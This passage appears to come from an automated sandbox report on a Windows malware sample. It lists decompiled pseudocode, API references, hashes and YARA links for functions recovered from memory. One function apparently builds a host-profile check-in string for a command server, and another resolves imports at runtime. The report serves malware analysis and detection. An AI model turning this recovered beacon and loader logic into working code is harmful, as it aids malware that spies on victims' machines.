							goto L60;
						}
						goto L52;
					}
				}
			}

0x0118888e
0x01188891
0x011888b1
0x011888bf
0x011888bf
0x011888c4
0x011888de
0x01188b0d
0x01188b14
0x01188b1b
0x01188b1b
0x011888e4
0x01188900
0x01188afb
0x01188b05
0x00000000
0x01188906
0x01188906
0x0118890b
0x01188921
0x0118890d
0x0118890d
0x0118891a
0x0118891a
0x0118892b
0x0118892d
0x01188937
0x0118893c
0x0118893c
0x01188937
0x01188943
0x01188959
0x01188945
0x01188945
0x01188952
0x01188952
0x0118895d
0x0118895f
0x01188969
0x0118896e
0x0118896e
0x01188969
0x01188975
0x0118898b
0x01188977
0x01188977
0x01188984
0x01188984
0x0118898f
0x01188991
0x0118899b
0x011889a0
0x011889a0
0x0118899b
0x011889a7
0x011889bd
0x011889a9
0x011889a9
0x011889b6
0x011889b6
0x011889c1
0x011889c3
0x011889cd
0x011889d2
0x011889d2
0x011889cd
0x011889d9
0x011889ef
0x011889db
0x011889db
0x011889e8
0x011889e8
0x011889f3
0x011889f5
0x011889ff
0x01188a04
0x01188a04
0x011889ff
0x01188a0b
0x01188a21
0x01188a0d
0x01188a0d
0x01188a1a
0x01188a1a
0x01188a25
0x01188a27
0x01188a2a
0x01188a2b
0x01188a32
0x01188a34
0x01188a35
0x01188a35
0x01188a32
0x01188a3c
0x01188a52
0x01188a3e
0x01188a3e
0x01188a4b
0x01188a4b
0x01188a56
0x01188a64
0x01188a6e
0x01188a6e
0x01188a75
0x01188a8b
0x01188a77
0x01188a77
0x01188a84
0x01188a84
0x01188a8f
0x01188aa2
0x01188aa2
0x01188aa7
0x01188aad
0x00000000
0x01188a91
0x01188a94
0x01188a99
0x01188aa0
0x01188ab2
0x01188ab4
0x01188aca
0x01188ab6
0x01188ab6
0x01188ac3
0x01188ac3
0x01188ace
0x01188ada
0x01188adf
0x01188adf
0x01188ad0
0x01188ad3
0x01188ad3
0x01188aed
0x01188af2
0x01188af8
0x00000000
0x01188af8
0x00000000
0x01188aa0
0x01188a8f

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008), ref: 01188933
StrToIntExA.SHLWAPI(00000000,00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008), ref: 01188965
StrToIntExA.SHLWAPI(00000000,00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008), ref: 01188997
StrToIntExA.SHLWAPI(00000000,00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008), ref: 011889C9
StrToIntExA.SHLWAPI(00000000,00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008), ref: 011889FB
HeapFree.KERNEL32(00000000,01185D25,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008,?,01185D25), ref: 01188AF2
HeapFree.KERNEL32(00000000,?,01185D25,?,63699BC3,?,01185D25,63699BC3,?,01185D25,63699BC3,00000005,0118D00C,00000008,?,01185D25), ref: 01188B05

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: de31fe1a26b5fa9654fbdc068496881b498bd4e8e613593394d4089af84c35f6
Instruction ID: e17c6f61f4e0529e17be099f5c893be84fd897e5fe018753495063c5dad4671d
Opcode Fuzzy Hash: de31fe1a26b5fa9654fbdc068496881b498bd4e8e613593394d4089af84c35f6
Instruction Fuzzy Hash: 36718470A00205EFDB6CFBF8E984D5FBBEEDB882147A4C921A515D7184E730D9818F61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4FB4, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1DBEF3
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1DBF08
UnhandledExceptionFilter.KERNEL32(6E1FDEAC), ref: 6E1DBF13
GetCurrentProcess.KERNEL32(C0000409), ref: 6E1DBF2F
TerminateProcess.KERNEL32(00000000), ref: 6E1DBF36

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction ID: e239c2e4e972f70165b1d4545fc472ad3b7e12bca548073ce95aba2cb4bf68fa
Opcode Fuzzy Hash: c39a1d0751f15ecd704f611782fc83e3ba3c46cc0d8d30c45a629ee662b98604
Instruction Fuzzy Hash: 5821F4B5415B04DFDF51DF7AC48C6983BB6BB0A325F10A01BE48987350E7B159A5CF21

Uniqueness

Uniqueness Score: -1.00%

Function 01181F13, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E01181F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x118d018; // 0xc25f505c
				asm("bswap eax");
				_t27 =  *0x118d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x118d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E0118D00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x118d2a8; // 0x48aa5a8
				_t3 = _t30 + 0x118e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x118d02c,  *0x118d004, _t25);
				_t33 = E011856CD();
				_t34 =  *0x118d2a8; // 0x48aa5a8
				_t4 = _t34 + 0x118e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E011858DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x118d2a8; // 0x48aa5a8
					_t6 = _t83 + 0x118e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x118d238, 0, _t96);
				}
				_t97 = E0118A199();
				if(_t97 != 0) {
					_t78 =  *0x118d2a8; // 0x48aa5a8
					_t8 = _t78 + 0x118e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x118d238, 0, _t97);
				}
				_t98 =  *0x118d32c; // 0x5a395b0
				_a32 = E01184622(0x118d00a, _t98 + 4);
				_t42 =  *0x118d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x118d2a8; // 0x48aa5a8
					_t11 = _t74 + 0x118e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x118d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x118d2a8; // 0x48aa5a8
					_t13 = _t71 + 0x118e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x118d238, 0, 0x800);
					if(_t100 != 0) {
						E0118518F(GetTickCount());
						_t50 =  *0x118d32c; // 0x5a395b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x118d32c; // 0x5a395b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x118d32c; // 0x5a395b0
						_t103 = E01181BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x118c28c);
							_push(_t103);
							_t62 = E0118361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E01186777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E01186761();
								}
								HeapFree( *0x118d238, 0, _v44);
							}
							HeapFree( *0x118d238, 0, _t103);
						}
						HeapFree( *0x118d238, 0, _t100);
					}
					HeapFree( *0x118d238, 0, _a24);
				}
				HeapFree( *0x118d238, 0, _t105);
				return _a12;
			}

0x01181f13
0x01181f13
0x01181f13
0x01181f18
0x01181f1e
0x01181f28
0x01181f2a
0x01181f2a
0x01181f37
0x01181f42
0x01181f45
0x01181f50
0x01181f53
0x01181f58
0x01181f5b
0x01181f60
0x01181f63
0x01181f6f
0x01181f7c
0x01181f7e
0x01181f84
0x01181f89
0x01181f94
0x01181f96
0x01181f99
0x01181fa0
0x01181fa4
0x01181fa6
0x01181fab
0x01181fb7
0x01181fb9
0x01181fc5
0x01181fc7
0x01181fc7
0x01181fd2
0x01181fd6
0x01181fd8
0x01181fdd
0x01181fe9
0x01181feb
0x01181ff7
0x01181ff9
0x01181ff9
0x01181fff
0x01182012
0x01182016
0x0118201d
0x01182020
0x01182025
0x01182030
0x01182032
0x01182035
0x01182035
0x01182037
0x0118203e
0x01182041
0x01182046
0x01182050
0x01182052
0x0118205a
0x01182073
0x01182077
0x01182083
0x01182088
0x01182091
0x011820a2
0x011820a6
0x011820af
0x011820b5
0x011820c2
0x011820cf
0x011820d5
0x011820e1
0x011820e7
0x011820e8
0x011820ed
0x011820f3
0x011820f9
0x01182100
0x01182107
0x0118210d
0x01182114
0x01182118
0x01182123
0x01182128
0x0118212e
0x01182137
0x01182137
0x01182148
0x01182148
0x01182157
0x01182157
0x01182166
0x01182166
0x01182178
0x01182178
0x01182187
0x01182198

APIs

GetTickCount.KERNEL32 ref: 01181F2A
wsprintfA.USER32 ref: 01181F77
wsprintfA.USER32 ref: 01181F94
wsprintfA.USER32 ref: 01181FB7
HeapFree.KERNEL32(00000000,00000000), ref: 01181FC7
wsprintfA.USER32 ref: 01181FE9
HeapFree.KERNEL32(00000000,00000000), ref: 01181FF9
wsprintfA.USER32 ref: 01182030
wsprintfA.USER32 ref: 01182050
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0118206D
GetTickCount.KERNEL32 ref: 0118207D
RtlEnterCriticalSection.NTDLL(05A39570), ref: 01182091
RtlLeaveCriticalSection.NTDLL(05A39570), ref: 011820AF

Part of subcall function 01181BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,011820C2,?,05A395B0), ref: 01181BE1
Part of subcall function 01181BB6: lstrlen.KERNEL32(?,?,?,011820C2,?,05A395B0), ref: 01181BE9
Part of subcall function 01181BB6: strcpy.NTDLL ref: 01181C00
Part of subcall function 01181BB6: lstrcat.KERNEL32(00000000,?), ref: 01181C0B
Part of subcall function 01181BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011820C2,?,05A395B0), ref: 01181C28

StrTrimA.SHLWAPI(00000000,0118C28C,?,05A395B0), ref: 011820E1

Part of subcall function 0118361A: lstrlen.KERNEL32(05A39A78,00000000,00000000,7742C740,011820ED,00000000), ref: 0118362A
Part of subcall function 0118361A: lstrlen.KERNEL32(?), ref: 01183632
Part of subcall function 0118361A: lstrcpy.KERNEL32(00000000,05A39A78), ref: 01183646
Part of subcall function 0118361A: lstrcat.KERNEL32(00000000,?), ref: 01183651

lstrcpy.KERNEL32(00000000,?), ref: 01182100
lstrcpy.KERNEL32(00000000,00000000), ref: 01182107
lstrcat.KERNEL32(00000000,?), ref: 01182114
lstrcat.KERNEL32(00000000,00000000), ref: 01182118

Part of subcall function 01186777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 01186829

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 01182148
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01182157
HeapFree.KERNEL32(00000000,00000000,?,05A395B0), ref: 01182166
HeapFree.KERNEL32(00000000,00000000), ref: 01182178
HeapFree.KERNEL32(00000000,?), ref: 01182187

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: c7c35cbd8a2bcfd9791f42411d4ae4e329af00a2be496e8d8b1c582c0ea25b60
Instruction ID: 5998f267183cd5b1930b4e1c86a0a8da6caf9a37c5b722946d150934b602cb1b
Opcode Fuzzy Hash: c7c35cbd8a2bcfd9791f42411d4ae4e329af00a2be496e8d8b1c582c0ea25b60
Instruction Fuzzy Hash: A361F531100201AFDB39ABA8FC48F5E7BE9EB493A4F148124FA14C71A4DB34D886DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0118AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0118AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x1180000;
				_t115 = _t139[3] + 0x1180000;
				_t131 = _t139[4] + 0x1180000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x1180000;
				_v16 = _t139[5] + 0x1180000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x1180002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x118d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x118d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x118d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x118d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x118d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x118d198; // 0x0
										 *_t102 = _t125;
										 *0x118d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x118d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x0118ac64
0x0118ac7a
0x0118ac80
0x0118ac82
0x0118ac87
0x0118ac8d
0x0118ac92
0x0118ac95
0x0118aca3
0x0118acaa
0x0118acad
0x0118acb0
0x0118acb1
0x0118acb4
0x0118acb7
0x0118acba
0x0118acbf
0x0118acce
0x00000000
0x0118acd4
0x0118acde
0x0118ace8
0x0118aced
0x0118acef
0x0118acf9
0x0118acfc
0x0118acff
0x0118ad05
0x0118ad07
0x0118ad07
0x0118ad0a
0x0118ad0d
0x0118ad12
0x0118ad16
0x0118ad29
0x0118ad2b
0x0118add3
0x0118add3
0x0118adda
0x0118addd
0x0118ade7
0x0118ade7
0x0118adeb
0x0118ae69
0x0118ae6c
0x0118ae6e
0x0118ae6e
0x0118ae75
0x0118ae77
0x0118ae81
0x0118ae84
0x0118ae87
0x0118ae87
0x00000000
0x0118aded
0x0118adf0
0x0118ae1e
0x0118ae28
0x0118ae2c
0x0118ae34
0x0118ae37
0x0118ae3e
0x0118ae48
0x0118ae48
0x0118ae4c
0x0118ae51
0x0118ae60
0x0118ae66
0x0118ae66
0x0118ae4c
0x00000000
0x0118adf7
0x0118adfa
0x0118ae02
0x0118ae17
0x0118ae1c
0x00000000
0x00000000
0x0118ae1c
0x00000000
0x0118ae02
0x0118adf0
0x0118adeb
0x0118ad31
0x0118ad38
0x0118ad48
0x0118ad51
0x0118ad55
0x0118ad98
0x0118ada4
0x0118adcd
0x0118ada6
0x0118adaa
0x0118adb0
0x0118adb8
0x0118adba
0x0118adbd
0x0118adc3
0x0118adc5
0x0118adc5
0x0118adb8
0x0118adaa
0x00000000
0x0118ada4
0x0118ad5d
0x0118ad60
0x0118ad67
0x0118ad77
0x0118ad7a
0x0118ad8a
0x00000000
0x0118ad90
0x0118ad71
0x0118ad75
0x00000000
0x00000000
0x00000000
0x0118ad75
0x0118ad42
0x0118ad46
0x00000000
0x00000000
0x00000000
0x0118ad46
0x0118ad1f
0x0118ad23
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0118ACCE
LoadLibraryA.KERNEL32(?), ref: 0118AD4B
GetLastError.KERNEL32 ref: 0118AD57
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0118AD8A

Strings

$, xrefs: 0118ACA3

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 7f363ba5d3ff58d61a8e712ceb07476275a2de22c659ebfe5967e79807bd8613
Instruction ID: f15281e01ffa1dcfacfab0b0625da7b50d384b3648049b7f8fccca3920ec789a
Opcode Fuzzy Hash: 7f363ba5d3ff58d61a8e712ceb07476275a2de22c659ebfe5967e79807bd8613
Instruction Fuzzy Hash: AC811B75A00605AFDB29DF98E880BAEB7F5AF48311F14C52AE615E7280E770E945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 01186C38, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E01186C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x118d33c; // 0x5a39798
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E0118A557(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x118c18c;
				}
				_t46 = E011818A5(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E0118A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x118d2a8; // 0x48aa5a8
						_t16 = _t75 + 0x118eb08; // 0x530025
						 *0x118d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E0118A557(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x118c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E0118A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E0118A734(_v20);
						} else {
							_t66 =  *0x118d2a8; // 0x48aa5a8
							_t31 = _t66 + 0x118ec28; // 0x73006d
							 *0x118d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E0118A734(_v12);
				}
				return _v24;
			}

0x01186c40
0x01186c46
0x01186c4d
0x01186c53
0x01186c57
0x01186c5b
0x01186c5e
0x01186c63
0x01186c68
0x01186c6a
0x01186c6a
0x01186c73
0x01186c78
0x01186c7d
0x01186c83
0x01186c8d
0x01186c96
0x01186c9d
0x01186cb6
0x01186cbb
0x01186cc0
0x01186cc9
0x01186cd2
0x01186ce3
0x01186cec
0x01186cf0
0x01186cf4
0x01186cf9
0x01186cfe
0x01186d00
0x01186d00
0x01186d0a
0x01186d13
0x01186d1a
0x01186d32
0x01186d36
0x01186d73
0x01186d38
0x01186d3b
0x01186d43
0x01186d54
0x01186d60
0x01186d68
0x01186d6c
0x01186d6c
0x01186d36
0x01186d7b
0x01186d80
0x01186d87

APIs

GetTickCount.KERNEL32 ref: 01186C4D
lstrlen.KERNEL32(?,80000002,00000005), ref: 01186C8D
lstrlen.KERNEL32(00000000), ref: 01186C96
lstrlen.KERNEL32(00000000), ref: 01186C9D
lstrlenW.KERNEL32(80000002), ref: 01186CAA
lstrlen.KERNEL32(?,00000004), ref: 01186D0A
lstrlen.KERNEL32(?), ref: 01186D13
lstrlen.KERNEL32(?), ref: 01186D1A
lstrlenW.KERNEL32(?), ref: 01186D21

Part of subcall function 0118A734: HeapFree.KERNEL32(00000000,00000000,01185637,00000000,?,?,00000000), ref: 0118A740

Memory Dump Source

Source File: 00000005.00000002.477260028.0000000001181000.00000020.00000001.sdmp, Offset: 01180000, based on PE: true

Associated: 00000005.00000002.477206295.0000000001180000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477354940.000000000118C000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.477409639.000000000118D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.477466693.000000000118F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 5afd02e3b99f53f59184ba958e907ba1c0e864a7c402b3ae9b68328d6ab9ef3c
Instruction ID: d8cadfa4b89837d817a9aab4d295edec2809bc88d7b4b068ca53f4bc253c40bd
Opcode Fuzzy Hash: 5afd02e3b99f53f59184ba958e907ba1c0e864a7c402b3ae9b68328d6ab9ef3c
Instruction Fuzzy Hash: 65415B76C00209FBCF15BFA4DC08ADEBBB5EF44358F158061E904AB250DB359A91EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAD66, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E200C28,0000000C,6E1DAEA1,00000000,00000000,?,6E1CC9C7,6E1D8C30,6E1D50D1,?,?,6E1CC9C7,0000041D), ref: 6E1DAD78
__crt_waiting_on_module_handle.LIBCMT ref: 6E1DAD83

Part of subcall function 6E1DCC55: Sleep.KERNEL32(000003E8,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC61
Part of subcall function 6E1DCC55: GetModuleHandleW.KERNEL32(6E1CC9C7,?,?,6E1DACC9,KERNEL32.DLL,?,6E1DD16E,?,6E1D50CB,6E1CC9C7,?,?,6E1CC9C7,0000041D), ref: 6E1DCC6A

__lock.LIBCMT ref: 6E1DADDE
InterlockedIncrement.KERNEL32(207CA16E), ref: 6E1DADEB
__lock.LIBCMT ref: 6E1DADFF
___addlocaleref.LIBCMT ref: 6E1DAE1D

Strings

KERNEL32.DLL, xrefs: 6E1DAD72, 6E1DAD77, 6E1DAD82

Memory Dump Source

Source File: 00000005.00000002.487375933.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: KERNEL32.DLL
API String ID: 4021795732-2576044830
Opcode ID: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction ID: 3afaf870f58e490e8322f7e58af8c73fc95c5d0ef1a7f59ac73937ae6c2eb39b
Opcode Fuzzy Hash: e0dcbc5c8770e3a254a9cf15aeaf7a14007286be2fffe1191aed1cf74ec4f160
Instruction Fuzzy Hash: 17118E71800B01DBD760DFF5C804B9EBBF9AF04314F20891AE4AAA7290CB74A985EB54

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D2490, Relevance: 12.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D2680: _localeconv.LIBCMT ref: 6E1D2687

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D24F6

Part of subcall function 6E1D2740: _strlen.LIBCMT ref: 6E1D274A

std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D2526
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D255E
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25BD
std::_Locinfo::_Getcvt.LIBCPMTD ref: 6E1D25E3
